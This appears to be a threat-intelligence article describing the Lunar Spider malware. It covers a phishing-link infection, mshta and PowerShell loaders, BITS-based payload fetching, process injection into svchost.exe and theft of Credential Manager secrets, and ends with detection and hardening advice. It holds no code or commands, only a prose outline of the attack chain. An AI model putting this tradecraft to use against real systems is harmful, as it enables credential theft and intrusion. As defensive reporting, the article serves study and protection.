In mid-September 2025, cybersecurity researchers identified a new malware strain named Lunar Spider, which poses a significant threat to Windows environments by compromising systems with a single click. This malware employs sophisticated techniques to evade detection and harvest sensitive user credentials.
Infection Mechanism
Lunar Spider’s attack begins with a phishing email or instant message containing a seemingly harmless link. When the recipient clicks the link, the malware initiates a stealthy download of its core components, utilizing legitimate Windows utilities to blend seamlessly with normal system activities. Within minutes, it establishes a foothold, scans for active user sessions, and harvests stored credentials without any visible signs of compromise.
Technical Analysis
Researchers at The DFIR Report discovered Lunar Spider after observing unusual Microsoft Credential Manager API calls on several corporate endpoints. The malware leverages the Windows Background Intelligent Transfer Service (BITS) to fetch additional modules from its command-and-control (C2) servers. This method obscures network traffic and prevents many endpoint detection systems from flagging the download.
Once the core binary is in place, Lunar Spider executes a lightweight loader written in PowerShell, launching secondary payloads directly in memory. This file-less approach significantly reduces forensic artifacts on disk, complicating incident response efforts.
Execution Chain
Upon link activation, a short batch script executes via mshta.exe, invoking an obfuscated PowerShell command that downloads the core payload. The script then injects the payload into a suspended svchost.exe process using Windows API calls, such as CreateProcess and WriteProcessMemory, before resuming execution. This injection technique conceals the malicious code under the guise of a trusted service host, thereby evading many heuristic-based scanners.
Once in memory, the injected payload locates and extracts credentials stored by Windows Credential Manager, using native APIs to enumerate and decrypt stored secrets. This approach allows Lunar Spider to harvest a wide array of credentials—ranging from RDP and VPN logins to saved web and database passwords—within seconds of injection.
Impact and Recommendations
The impact of Lunar Spider’s campaign has been profound. Affected organizations report unauthorized access to internal dashboards and email accounts, followed by targeted phishing campaigns from compromised mailboxes. In some cases, attackers have leveraged stolen credentials to move laterally across networks, exfiltrating sensitive documents and financial records.
Security teams have struggled to isolate the infection due to Lunar Spider’s minimal footprint and its use of legitimate Windows processes. In response to this growing threat, organizations are urged to monitor unusual mshta.exe and PowerShell child processes, enforce strict application whitelisting, and segment privilege levels to limit access to Credential Manager data. Enhanced network monitoring for abnormal BITS transfers can also help detect C2 communications early.
As Lunar Spider continues to evolve, defenders must adopt a layered security posture that combines behavioral analytics with proactive threat hunting to mitigate the risks posed by this stealthy malware.
